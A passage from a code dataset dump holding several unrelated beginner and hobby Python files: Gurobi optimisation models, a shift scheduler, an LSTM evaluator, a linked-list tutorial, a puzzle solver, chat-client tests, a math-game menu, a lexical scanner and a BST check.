blocks) <= capacity.iloc[i]*x1[i])\n\n## each block is assigned to exactly 1 pod site\nfor k in blocks:\n m1.addConstr(sum(y1[i, k] for i in pod_sites) == 1)\n\n# the total money used is at most the maximum budget\nm1.addConstr(sum(cost.iloc[i]*x1[i] for i in pod_sites) <= budget)\n\n\nm1.optimize()\n\n\n\n####### MODEL 2\nm2 = gp.Model()\n\n# Decision variables\nx2 = m2.addVars(pod_sites, vtype=GRB.BINARY)\ny2 = m2.addVars(pod_sites, blocks, vtype=GRB.BINARY)\nM = m2.addVar(lb=0.0, obj=1.0, vtype=GRB.CONTINUOUS)\n\n# Objective function\nm2.modelSense = GRB.MINIMIZE\nm2.setObjective(M)\n\n# Constraints\n\n## maximum distance traveled for anyone is M\nfor i in pod_sites:\n for k in blocks:\n m2.addConstr((y2[i, k]*distance.iloc[k, i]) <= M)\n\n## all pod sites are bounded by a given capacity\nfor i in pod_sites:\n m2.addConstr(sum(y2[i, k]*population.iloc[k] for k in blocks) <= capacity.iloc[i]*x2[i])\n\n## each block is assigned to exactly 1 pod site\nfor k in blocks:\n m2.addConstr(sum(y2[i, k] for i in pod_sites) == 1)\n\n# the total money used is at most the maximum budget\nm2.addConstr(sum(cost.iloc[i]*x2[i] for i in pod_sites) <= budget)\n\n\nm2.optimize()\n\n","sub_path":"V1_DABP_Code/DABP_Final_Project.py","file_name":"DABP_Final_Project.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"277705020","text":"\r\n\"\"\"\r\nWritten by Abhinandan Das\r\nFind the specifications on how to use the program in the Wiki section of the Repository\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport random\r\nimport calendar\r\nr = input(\"\\nInput Month number: \")\r\nr = int(r)\r\nq = input(\"Input the year: \")\r\nq = int(q)\r\n# backslash = \"\\\\\\\\\\\\\"\r\npathin = input(\"Input location (*.csv): \")\r\npathout = input(\"Output Location (*.xlsx): \")\r\n# pathin, pathout = str(pathin), str(pathout)\r\npathin = str(pathin)\r\npathout = str(pathout)\r\n\r\nemployees_df = pd.read_csv(pathin)\r\nemployees_names = [employees_df.columns[i+1] for i in range( 0,len(employees_df.columns)-1 )]\r\nnow = calendar.datetime.datetime.now()\r\npresentdate = str(now.year) + '-' + str(now.month) + '-' + str(now.day)\r\nc = calendar.TextCalendar()\r\n\r\n# q = now.year\r\n# r = now.month\r\nz = []\r\n\r\n\r\nfor i in c.itermonthdays2(q, r):\r\n z.append(list(i))\r\nmonth_names = {\r\n 1:'January',\r\n 2: 'February',\r\n 3:'March',\r\n 4:'April',\r\n 5:'May',\r\n 6:'June',\r\n 7:'July',\r\n 8:'August',\r\n 9:'September',\r\n 10:'October',\r\n 11:'November',\r\n 12:'December'\r\n}\r\nSHEET_NAME = 'Dispatcher Slot for' + ' ' + month_names[r]\r\npurge_days = ([[0,i] for i in range(0,7)] + \r\n [[a,b] for a in range(0,32) for b in range(5,7)] + \r\n [[25,j] for j in range(0,7) if r == 12] + \r\n [[1,k] for k in range(0,7) if r == 1] +\r\n [[1,l] for l in range(0,7) if r == 5])\r\n# purge_days\r\nz = [i for i in z if i not in purge_days]\r\nworkdates = []\r\nfor i in range(0, len(z)):\r\n workdates = workdates + [\r\n str(q) + '-' + str(r) + '-' + \r\n str(z[i][0])]\r\npurge_days = []\r\n# with open('D:\\\\Users\\\\abhindas\\\\Desktop\\\\dispatcher\\\\global_holidays.csv','r') as file:\r\n# for line in file:\r\n# purge_days = purge_days + [line.rstrip('\\n')]\r\nworkdates = [i for i in workdates if i not in purge_days]\r\nrandom.shuffle(employees_names)\r\nnew_emp_df = employees_df[employees_df.Date.isin(workdates)]\r\nslot_1, slot_2, slot_3, slot_4 = [], [], [], []\r\nd, i = 0,0\r\nfor date in workdates:\r\n v_df = new_emp_df[new_emp_df.Date == date]\r\n random.shuffle\r\nslot = pd.Series(slot_1)\r\n# print(slot)\r\ndef countstr(str):\r\n return(slot_1.count(str) + slot_2.count(str) + slot_3.count(str) + slot_4.count(str)) \r\n\r\nfor date in workdates:\r\n v_df = new_emp_df[new_emp_df.Date == date]\r\n available_names = [v_df.columns[i+1] for i in range( 0,len(v_df.columns)-1 ) if pd.Series.tolist(v_df[v_df.columns[i+1]])[0] == 'INDIA' ]\r\n random.shuffle(available_names)\r\n\r\n temp = random.sample(available_names,3)\r\n slot_1.append(temp[0])\r\n slot_2.append(temp[1])\r\n slot_3.append(temp[2])\r\n \r\n available_names1 = [v_df.columns[i+1] for i in range( 0,len(v_df.columns)-1 ) if pd.Series.tolist(v_df[v_df.columns[i+1]])[0] in ['US','UK'] ]\r\n random.shuffle(available_names1)\r\n temp1 = random.sample(available_names1,1)\r\n slot_4.append(temp1[0])\r\n\r\ndict1 = {'Date': workdates, '[10AM - 1PM]': slot_1,'[1PM - 4 PM]': slot_2,'[4PM - 7PM]': slot_3,'[7PM - 10PM]': slot_4}\r\ndict1_df = pd.DataFrame(dict1)\r\nprint(dict1_df)\r\n\r\nprint(\"\\n\")\r\n\r\n# dict1_df.to_excel('D:\\\\Users\\\\abhindas\\\\Desktop\\\\dispatcher\\\\Disptacher_13FEB.xlsx', index = None, header=True, sheet_name=SHEET_NAME)\r\ndict1_df.to_excel(pathout, index = None, header=True, sheet_name=SHEET_NAME)\r\n\r\nemployees_names.sort()\r\nfor i in employees_names:\r\n print(i + \" : count : \" + str(countstr(i)))\r\n\r\n\r\n","sub_path":"disp_auto.py","file_name":"disp_auto.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"596831404","text":"from src.model import evaluate_t_plus_5_performance, evaluate_t_plus_1_performance\nfrom src.model import ts_norm_to_scaled, ts_scaled_to_norm, features\nimport argparse\nfrom src.model import demand_lstm\nimport pandas as pd\n\n\nparser = argparse.ArgumentParser(description='Load trained model and evaluate')\nparser.add_argument('--model_path', metavar='MODEL_PATH', type=str,\n default='./models/best_lstm_model',\n help='Path of trained model. Default value corresponds to previously trained model')\nparser.add_argument('--transformed_test_df_path', metavar='TRANSFORMED_TEST_DF_PATH', type=str,\n default='NOPATH',\n help='Path of transformed test df. Test df initially needs to be passed in preprocess_dataset.py'\n )\n\nif __name__ == '__main__':\n print('Evaluating performance at t+1 only, followed by performance at t+1...t+5')\n demand_features = features['demand_features']\n ts_features = features['ts_features']\n target_features = features['target_features']\n\n step_back = len(demand_features)\n ts_shape = len(ts_features)\n y_shape = len(target_features)\n\n args = parser.parse_args()\n model_path = args.model_path\n transformed_test_df_path = args.transformed_test_df_path\n\n transformed_test_df = pd.read_parquet(transformed_test_df_path)\n\n model = demand_lstm(step_back, ts_shape, y_shape)\n model.load_weights(model_path)\n\n # evaluate performance at t + 1\n evaluate_t_plus_1_performance(transformed_test_df, model, demand_features, ts_features, target_features)\n\n # evalute performance at t + 5\n evaluate_t_plus_5_performance(transformed_test_df, model, ts_norm_to_scaled, ts_scaled_to_norm,\n demand_features, ts_features)\n print('Performance evaluation over.')\n","sub_path":"src/evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"438330544","text":"# Reverse a Linked List in groups of given size \r\n# Given a linked list, write a function to reverse every k nodes (where k is an input to the function). \r\n\r\n# Example: \r\n\r\n# Input: 1->2->3->4->5->6->7->8->NULL, K = 3 \r\n# Output: 3->2->1->6->5->4->8->7->NULL \r\n# Input: 1->2->3->4->5->6->7->8->NULL, K = 5 \r\n# Output: 5->4->3->2->1->8->7->6->NULL \r\n\r\n# Algorithm: reverse(head, k) \r\n\r\n# Reverse the first sub-list of size k. While reversing keep track of the next node and previous node. Let the pointer to the next node be next and pointer to the previous node be prev. See this post for reversing a linked list.\r\n# head->next = reverse(next, k) ( Recursively call for rest of the list and link the two sub-lists )\r\n# Return prev ( prev becomes the new head of the list (see the diagrams of iterative method of this post) )\r\n\r\n# Python program to reverse a \r\n# linked list in group of given size\r\n\r\n# Node class\r\n\r\n\r\nclass Node:\r\n\r\n\t# Constructor to initialize the node object\r\n\tdef __init__(self, data):\r\n\t\tself.data = data\r\n\t\tself.next = None\r\n\r\n\r\nclass LinkedList:\r\n\r\n\t# Function to initialize head\r\n\tdef __init__(self):\r\n\t\tself.head = None\r\n\r\n\tdef reverse(self, head, k):\r\n\t\r\n\t\tif head == None:\r\n\t\t return None\r\n\t\tcurrent = head\r\n\t\tnext = None\r\n\t\tprev = None\r\n\t\tcount = 0\r\n\r\n\t\t# Reverse first k nodes of the linked list\r\n\t\twhile(current is not None and count < k):\r\n\t\t\tnext = current.next\r\n\t\t\tcurrent.next = prev\r\n\t\t\tprev = current\r\n\t\t\tcurrent = next\r\n\t\t\tcount += 1\r\n\r\n\t\t# next is now a pointer to (k+1)th node\r\n\t\t# recursively call for the list starting\r\n\t\t# from current. And make rest of the list as\r\n\t\t# next of first node\r\n\t\tif next is not None:\r\n\t\t\thead.next = self.reverse(next, k)\r\n\r\n\t\t# prev is new head of the input list\r\n\t\treturn prev\r\n\r\n\t# Function to insert a new node at the beginning\r\n\tdef push(self, new_data):\r\n\t\tnew_node = Node(new_data)\r\n\t\tnew_node.next = self.head\r\n\t\tself.head = new_node\r\n\r\n\t# Utility function to print the linked LinkedList\r\n\tdef printList(self):\r\n\t\ttemp = self.head\r\n\t\twhile(temp):\r\n\t\t\tprint (temp.data,end=\" \")\r\n\t\t\ttemp = temp.next\r\n\r\n\r\n# Driver program\r\nllist = LinkedList()\r\nllist.push(9)\r\nllist.push(8)\r\nllist.push(7)\r\nllist.push(6)\r\nllist.push(5)\r\nllist.push(4)\r\nllist.push(3)\r\nllist.push(2)\r\nllist.push(1)\r\n\r\nprint(\"Given linked list\")\r\nllist.printList()\r\nllist.head = llist.reverse(llist.head, 3)\r\n\r\nprint(\"\\nReversed Linked list\")\r\nllist.printList()\r\n\r\n# Complexity Analysis: \r\n\r\n# Time Complexity: O(n). \r\n# Traversal of list is done only once and it has ‘n’ elements.\r\n# Auxiliary Space: O(n/k). \r\n# For each Linked List of size n, n/k or (n/k)+1 calls will be made during the recursion.\r\n\r\n","sub_path":"geeksforgeeks/linkedlist/singly-linked-list/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"28330113","text":"#pass multiple parameters\ndef print_args(val, **kwargs):\n print (val)\n print (kwargs['name'])\n\nprint_args(\"hello\", name=\"luis\", lastname=\"Salazar\")\n\n#app\nstudents=[]\n\ndef get_students_titlecase():\n students_titlecase=[]\n for student in students:\n students_titlecase.append(student['name'].title())\n return students_titlecase\n\n\ndef print_studens_titlecase():\n students_titlecase= get_students_titlecase()\n print (students_titlecase)\n\n\ndef add_student(student_name, student_id=1):\n student={\n \"name\": student_name,\n \"id\": student_id\n }\n students.append(student)\n\n\ndef read_file():\n try:\n students_file= open(\"students.txt\", \"r\")\n\n for student in read_students(students_file):\n add_student(student)\n\n students_file.close()\n\n except Exception as ex:\n print(ex)\n\n#yield\ndef read_students(f):\n for line in f:\n yield line\n\ndef save_file(student):\n try:\n students_file = open(\"students.txt\", \"a\")\n students_file.write(student + \"\\n\")\n students_file.close()\n\n except Exception as ex:\n print(ex)\n\n\nread_file()\nprint_studens_titlecase()\n\nstudent_name= input(\"Student name: \")\nstudent_id= input(\"Student ID: \")\n\nadd_student(student_name, student_id)\nsave_file(student_name)\n","sub_path":"E08_yield.py","file_name":"E08_yield.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"510069565","text":"from collections import defaultdict\n\ndef getInput(inputFile):\n fields = []\n cond = []\n myTicket = []\n nearbyTickets = []\n for line in inputFile:\n if line == '\\n':\n break\n line = line.split(': ')\n fields.append(line[0])\n line = line[1]\n line = line.replace('\\n', '')\n line = line.split(' or ')\n temp = []\n for pos in line:\n pos = pos.split('-')\n for i in range(len(pos)):\n pos[i] = int(pos[i])\n temp.append(pos)\n cond.append(temp)\n inputFile.readline()\n myTicket = inputFile.readline().split(',')\n for i in range(len(myTicket)):\n myTicket[i] = int(myTicket[i])\n inputFile.readline()\n inputFile.readline()\n for line in inputFile:\n line = line.split(',')\n for i in range(len(line)):\n line[i] = int(line[i])\n nearbyTickets.append(line)\n return fields, cond, myTicket, nearbyTickets\n\ndef assingNumbers(cond):\n numbers = set()\n for line in cond:\n for interval in line:\n for i in range(interval[0], interval[1]+1):\n numbers.add(i)\n return numbers\n\ndef task1(numbers, nearbyTickets):\n i = 0\n while i < len(nearbyTickets):\n for num in nearbyTickets[i]:\n if num not in numbers:\n nearbyTickets.pop(i)\n i-=1\n i+=1\n return nearbyTickets\n\n#------------------------------PART-2-----------------------------------\ndef makeTable(fields, cond):\n table = defaultdict(set)\n for i, field in enumerate(fields):\n for j in range(len(cond[i])):\n for k in range(cond[i][j][0], cond[i][j][1]+1):\n table[field].add(k)\n return table\n\ndef clearColumns(columns, fields, removedSet):\n for i in range(len(fields)):\n if len(columns[i]) == 1 and columns[i][0] not in removedSet:\n removed = columns[i][0]\n removedSet.add(removed)\n break\n \n for i in range(len(fields)):\n if len(columns[i]) > 1:\n try:\n columns[i].remove(removed)\n except:\n continue\n \n for i in range(len(fields)):\n if len(columns[i]) > 1:\n return clearColumns(columns, fields, removedSet)\n return columns\n \n\n\ndef task2(table, nearbyTickets, fields):\n columns = defaultdict(list)\n for i in range(len(nearbyTickets[0])):\n for field in fields:\n for ticket in nearbyTickets:\n if ticket[i] not in table[field]:\n break\n else:\n columns[i].append(field)\n \n columns = clearColumns(columns, fields, set())\n\n indexSet = set()\n for i in range(len(columns)):\n if 'departure' in columns[i][0]:\n indexSet.add(i)\n \n res = 1\n myTicket = nearbyTickets[-1]\n for index in indexSet:\n res *= myTicket[index]\n return res\n#=========================================================================\ninputFile = open(\"input.txt\", 'r')\nfields, cond, myTicket, nearbyTickets = getInput(inputFile)\ninputFile.close()\nnumbers = assingNumbers(cond)\n#print(numbers)\nnearbyTickets = task1(numbers, nearbyTickets)\nnearbyTickets.append(myTicket)\ntable = makeTable(fields, cond)\n#print(table)\n#print(cond)\n#print(nearbyTickets)\n#print(fields)\nprint(task2(table, nearbyTickets, fields))\n\n\n","sub_path":"day16/day16.2.py","file_name":"day16.2.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"593909245","text":"import pytest\n\nfrom zulipterminal.helper import (\n index_messages,\n)\nfrom typing import Any\n\n\ndef test_index_messages_narrow_all_messages(mocker,\n messages_successful_response,\n index_all_messages,\n initial_index) -> None:\n messages = messages_successful_response['messages']\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = []\n assert index_messages(messages, model, model.index) == index_all_messages\n\n\ndef test_index_messages_narrow_stream(mocker,\n messages_successful_response,\n index_stream,\n initial_index) -> None:\n messages = messages_successful_response['messages']\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['stream', 'PTEST']]\n model.stream_id = 205\n assert index_messages(messages, model, model.index) == index_stream\n\n\ndef test_index_messages_narrow_topic(mocker,\n messages_successful_response,\n index_topic,\n initial_index) -> None:\n messages = messages_successful_response['messages']\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['stream', '7'],\n ['topic', 'Test']]\n model.stream_id = 205\n assert index_messages(messages, model, model.index) == index_topic\n\n\ndef test_index_messages_narrow_user(mocker,\n messages_successful_response,\n index_user,\n initial_index) -> None:\n messages = messages_successful_response['messages']\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['pm_with', 'boo@zulip.com']]\n model.user_id = 5140\n model.user_dict = {\n 'boo@zulip.com': {\n 'user_id': 5179,\n }\n }\n assert index_messages(messages, model, model.index) == index_user\n\n\ndef test_index_messages_narrow_user_multiple(mocker,\n messages_successful_response,\n index_user_multiple,\n initial_index) -> None:\n messages = messages_successful_response['messages']\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['pm_with', 'boo@zulip.com, bar@zulip.com']]\n model.user_id = 5140\n model.user_dict = {\n 'boo@zulip.com': {\n 'user_id': 5179,\n },\n 'bar@zulip.com': {\n 'user_id': 5180\n }\n }\n assert index_messages(messages, model, model.index) == index_user_multiple\n\n\n@pytest.mark.parametrize('msgs_with_stars', [\n {537286, 537287, 537288},\n {537286}, {537287}, {537288},\n {537286, 537287}, {537286, 537288}, {537287, 537288},\n])\ndef test_index_starred(mocker,\n messages_successful_response,\n empty_index,\n msgs_with_stars,\n initial_index):\n messages = messages_successful_response['messages']\n for msg in messages:\n if msg['id'] in msgs_with_stars and 'starred' not in msg['flags']:\n msg['flags'].append('starred')\n\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['is', 'starred']]\n\n expected_index = dict(empty_index, all_private={537287, 537288},\n all_starred=msgs_with_stars)\n for msg_id, msg in expected_index['messages'].items():\n if msg_id in msgs_with_stars and 'starred' not in msg['flags']:\n msg['flags'].append('starred')\n\n assert index_messages(messages, model, model.index) == expected_index\n","sub_path":"tests/helper/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"320663109","text":"import random\nimport math\nimport random as rm\nimport math as mt\nfrom random import choice\nimport time\nfrom typing import final\nimport pyfiglet\nimport colorama\nfrom colorama import Back, Fore, Style, init\nimport sys \n\n\n#MAGIC MATH GAME - titulo\n\ncolorama.init(autoreset=True)\n\nif 1 == 1:\n print(f\"\\n{Fore.RED}M{Fore.LIGHTRED_EX}A{Fore.YELLOW}G{Fore.LIGHTYELLOW_EX}I{Fore.LIGHTGREEN_EX}C {Fore.GREEN}M{Fore.LIGHTCYAN_EX}A{Fore.CYAN}T{Fore.LIGHTBLUE_EX}H {Fore.BLUE}G{Fore.LIGHTMAGENTA_EX}A{Fore.MAGENTA}M{Fore.MAGENTA}E\"'\\n')\n if 2==1:\n p = 3\n\n#Introduccion tiempo retraso\nvelocidad = float(input(f'{Fore.LIGHTYELLOW_EX}Ingresa la velocidad para las instrucciones: '))\ndef delay_print(s):\n for c in s:\n sys.stdout.write(c)\n sys.stdout.flush()\n time.sleep(float(f'{velocidad}'))\n\nnombre = input(f'{Fore.YELLOW}Ingresa tu nombre: ')\ndelay_print(f'¡Bienvenid@ {nombre}!\\n')\n#Intro\ndef delay_print(s):\n for c in s:\n sys.stdout.write(c)\n sys.stdout.flush()\n time.sleep(float(f'{velocidad}'))\n\nintro1 = str(f'\\nA continuación tendrás que poner a prueba tus conocimientos y habilidades, contestando problemas matemáticos de cuatro áreas.')\nintro2 = str(f'Los resultados se mostrarán una vez finalizado y respondido las cuatro áreas.')\ndelay_print(f'{intro1}\\n{intro2}')\n\n# Evalución \ndef delay_print(s):\n for c in s:\n sys.stdout.write(c)\n sys.stdout.flush()\n time.sleep(float(f'{velocidad}'))\n\nevalua1 = str(f'\\nCada ejercicio vale 2 puntos.')\nevalua2 = str(f'Necesitas el 70% para aprobar el área.\\n')\ndelay_print(f'{evalua1}\\n{evalua2}')\n\n# Codigo - Menu\n\nmenu = f\"\"\"\n{Fore.LIGHTCYAN_EX}Bienvenido 💙\n{Fore.YELLOW} 1 - Aritmética\n{Fore.MAGENTA} 2 - Álgebra\n{Fore.LIGHTGREEN_EX} 3 - Geometría\n{Fore.BLUE} 4 - Probabilidad y estadística\n{Fore.RED} 5 - Salir\n\n{Fore.RED}Elige una area: \n\"\"\"\nopcion = input(menu)\n\ndef area(area_elegida):\n if area_elegida == '1':\n print(f\"{Fore.YELLOW}Empecemos con Aritmética\")\n \n\n elif area_elegida == '2':\n print(f\"{Fore.MAGENTA}Empecemos con Álgebra\")\n \n\n elif area_elegida == '3':\n print(f\"{Fore.MAGENTA}Empecemos con Geometría\")\n \n\n elif area_elegida == '4':\n print(f\"{Fore.BLUE}Empecemos con Probabilidad y estadística\")\n \n\n elif area_elegida == '5':\n print(f\"{Fore.LIGHTYELLOW_EX}Adios, regresa para seguir aprendiendo\")\n\n else:\n print(f'{Fore.RED}Ingresa una opción correcta por favor, ¡Exito en tu prueba!😎')\n\narea = area(opcion)","sub_path":"proyecto-integrador/pisa.py","file_name":"pisa.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"537842969","text":"input_file = open(\"input.txt\", 'r')\ncode = input_file.read()\n\noutput_file = open(\"scanner.txt\", 'w+')\nfirst_output = True\n\nlexical_error_file = open(\"lexical_errors.txt\", 'w+')\nfirst_lexical_error = True\n\nstart_ind = 0\nend_ind = 0\nind = -1\ncurrent_char = ''\nnext_char = ''\nline_num = 1\nline_changed = True\nerror_line_changed = True\n\nTOKEN_INITIAL = 0\nTOKEN_NUM = 1\nTOKEN_KEYWORD = 2\nTOKEN_ID = 3\nTOKEN_SYMBOL = 4\nTOKEN_COMMENT = 5\nTOKEN_WHITESPACE = 6\nTOKEN_EOF = 7\nEOF = \"@EOF@\"\nstate = TOKEN_INITIAL\nsymbols = [';', ':', ',', '[', ']', '(', ')', '{', '}', '+', '-', '*', '=', '<', '==']\nwhitespace = ['\\n', '\\r', '\\t', ' ', '\\v', '\\f']\ndigit = [str(i) for i in range(10)]\nalphabet = [chr(i) for i in range(65, 91)] + [chr(i) for i in range(97, 123)]\nkeywords = ['if', 'else', 'void', 'int', 'while', 'break', 'continue', 'switch', 'default', 'case', 'return', 'int']\ncomments = ['/', '*']\nall_letters = symbols + whitespace + digit + alphabet + keywords + comments\n\n\ndef get_string():\n global start_ind, end_ind, code\n return code[start_ind:end_ind] # TODO- end_int + 1 ????\n\n\ndef get_char():\n global ind, code, current_char, next_char\n ind += 1\n if ind < len(code):\n current_char = code[ind]\n if ind + 1 < len(code):\n next_char = code[ind + 1]\n return current_char\n\n current_char = None\n return EOF\n\n\ndef num():\n global end_ind\n while current_char is not None:\n if current_char not in digit:\n if current_char in symbols or current_char in whitespace or current_char in all_letters:\n return True, get_string(), 'NUM'\n else:\n return False, get_string() + current_char, 'invalid input'\n get_char()\n end_ind = ind\n return True, get_string(), 'NUM'\n\n\ndef symbol():\n global end_ind\n if current_char == '=':\n if next_char == '=':\n get_char()\n end_ind = ind\n\n get_char()\n end_ind = ind\n return True, get_string(), 'SYMBOl'\n\n\ndef skip_whitespace():\n global line_num, line_changed, error_line_changed\n global end_ind\n while current_char in whitespace:\n if current_char == '\\n':\n line_num += 1\n line_changed = True\n error_line_changed = True\n get_char()\n end_ind = ind\n\n\ndef id():\n global end_ind, ind\n while current_char is not None:\n\n if (current_char not in digit) and (current_char not in alphabet):\n if current_char in symbols or current_char in whitespace:\n if get_string() in keywords:\n return True, get_string(), 'KEYWORD'\n\n return True, get_string(), 'ID'\n else:\n return False, get_string() + current_char, 'invalid input'\n get_char()\n end_ind = ind\n\n return True, get_string(), 'ID'\n\n\ndef comment():\n global end_ind\n if next_char == '/':\n get_char()\n end_ind = ind\n while current_char is not '\\n' and current_char is not None:\n get_char()\n end_ind = ind\n\n return True, None, 'COMMENT'\n if next_char == '*':\n get_char()\n end_ind = ind\n\n while current_char is not None and (current_char + next_char != '*/'):\n get_char()\n end_ind = ind\n\n get_char()\n get_char()\n end_ind = ind\n\n return True, None, 'COMMENT'\n\n get_char()\n return False, get_string() + current_char, 'invald input'\n\n\ndef get_next_token():\n global state, end_ind, start_ind\n get_char()\n is_token = False\n token_string = token_type = ''\n while current_char is not None:\n skip_whitespace()\n start_ind = ind\n if current_char in digit:\n state = TOKEN_NUM\n is_token, token_string, token_type = num()\n\n elif current_char in symbols:\n state = TOKEN_SYMBOL\n is_token, token_string, token_type = symbol()\n\n elif current_char in alphabet:\n is_token, token_string, token_type = id()\n\n elif current_char == '/':\n state = TOKEN_COMMENT\n is_token, token_string, token_type = comment()\n\n else:\n is_token = False\n token_type = 'invalid input'\n token_string = current_char\n\n if is_token and state != TOKEN_COMMENT:\n print_token(token_type, token_string)\n elif not is_token:\n get_char()\n print_error(token_type, token_string)\n\n start_ind = ind\n state = TOKEN_INITIAL\n\n\ndef print_token(token_type, token_string):\n global output_file, line_changed, first_output\n if line_changed and not first_output:\n print()\n output_file.write('\\n')\n if line_changed:\n print(str(line_num) + '. (' + token_type + ', ' + token_string + ')', end='')\n output_file.write(str(line_num) + '. (' + token_type + ', ' + token_string + ')')\n line_changed = False\n else:\n print(' (' + token_type + ', ' + token_string + ')', end='')\n output_file.write(' (' + token_type + ', ' + token_string + ')')\n first_output = False\n\n\ndef print_error(token_type, token_string):\n global lexical_error_file, error_line_changed, first_lexical_error\n if error_line_changed and not first_error:\n print()\n error_file.write('\\n')\n if error_line_changed:\n print(str(line_num) + '. (' + token_string + ', ' + token_type + ')', end='')\n error_file.write(str(line_num) + '. (' + token_string + ', ' + token_type + ')')\n error_line_changed = False\n else:\n print(' (' + token_string + ', ' + token_type + ')', end='')\n error_file.write(' (' + token_string + ', ' + token_type + ')')\n first_error = False\n\n\nget_next_token()\noutput_file.close()\nlexical_error_file.close()\ninput_file.close()\n","sub_path":"Compiler Design Project - Spring 2019/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"150510781","text":"\n\n#calss header\nclass _MOTORWAY():\n\tdef __init__(self,): \n\t\tself.name = \"MOTORWAY\"\n\t\tself.definitions = [u'a wide road for fast-moving traffic, especially in the UK, Ireland, and some other countries, with a limited number of places at which drivers can enter and leave it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_motorway.py","file_name":"_motorway.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213340500","text":"from django.test import TestCase, RequestFactory\n\nfrom api.app.models.games import *\nfrom api.app.views.games import *\n\n\nclass GamesTest(TestCase):\n \"\"\"\n Test view functionality for basic game functions\n \"\"\"\n\n def setUp(self):\n # Every test needs access to the request factory.\n self.factory = RequestFactory()\n self.user = User.objects.create_user(username='test_user', email='test@example.com', password='test_pass')\n self.game = Game.objects.create(\n name='Sample of Fun',\n abbreviation='SoF',\n description='This is a sample game!',\n game_master=self.user\n )\n\n def test_get_list(self):\n request = self.factory.get('/games/')\n request.user = self.user\n response = game_list(request)\n self.assertEqual(response.status_code, 200)\n\n def test_get_create(self):\n request = self.factory.get('/games/new/')\n request.user = self.user\n response = game_create(request)\n self.assertEqual(response.status_code, 200)\n\n def test_post_create(self):\n request = self.factory.post('/games/new/', {\n 'name': 'Test of Fun',\n 'abbreviation': 'ToF',\n 'description': 'This is a test game!'\n }, follow=True)\n request.user = self.user\n response = game_create(request)\n self.assertEqual(response.status_code, 302)\n game = Game.objects.filter(name='Test of Fun')\n self.assertIsNotNone(game)\n\n def test_get_view(self):\n request = self.factory.get('/games/view/')\n request.user = self.user\n response = game_view(request, self.game.id)\n self.assertEqual(response.status_code, 200)\n\n def test_get_update(self):\n request = self.factory.get('/games/edit/')\n request.user = self.user\n response = game_update(request, self.game.id)\n self.assertEqual(response.status_code, 200)\n\n def test_post_update(self):\n new_name = 'Sample of Fun 2'\n request = self.factory.post('/games/edit/', {\n 'name': new_name,\n 'abbreviation': self.game.abbreviation,\n 'description': self.game.description\n }, follow=True)\n request.user = self.user\n response = game_update(request, self.game.id)\n self.assertEqual(response.status_code, 302)\n self.game.refresh_from_db()\n self.assertEqual(self.game.name, new_name)\n\n def test_get_delete(self):\n request = self.factory.get('/games/delete/')\n request.user = self.user\n response = game_delete(request, self.game.id)\n self.assertEqual(response.status_code, 200)\n\n def test_post_delete(self):\n game_id = self.game.id\n request = self.factory.post('/games/delete/')\n request.user = self.user\n response = game_delete(request, game_id)\n self.assertEqual(response.status_code, 302)\n game = Game.objects.filter(pk=game_id).first()\n self.assertIsNone(game)\n\n def test_get_next_status(self):\n request = self.factory.get('/games/nextStatus/', follow=True)\n request.user = self.user\n response = game_next_status(request, self.game.id)\n self.assertEqual(response.status_code, 302)\n self.game.refresh_from_db()\n self.assertEqual(Game.REGISTRATION, self.game.status)\n\n def test_get_prev_status(self):\n self.game.next_status()\n request = self.factory.get('/games/prevStatus/', follow=True)\n request.user = self.user\n response = game_previous_status(request, self.game.id)\n self.assertEqual(response.status_code, 302)\n self.game.refresh_from_db()\n self.assertEqual(Game.DRAFT, self.game.status)\n","sub_path":"backend/api/app/tests/integration/games/TestGames.py","file_name":"TestGames.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"446045016","text":"from MinimalTree import MinimalTree\n\ndef ValidateBST(root):\n value = root.value\n leftTree = root.left_child\n rightTree = root.right_child\n if leftTree != None and leftTree.max() >= value:\n return False\n if rightTree != None and rightTree.min() <= value:\n return False\n if (leftTree == None or ValidateBST(leftTree)) and (rightTree == None or ValidateBST(rightTree)):\n return True\n else:\n return False\n\ntree = 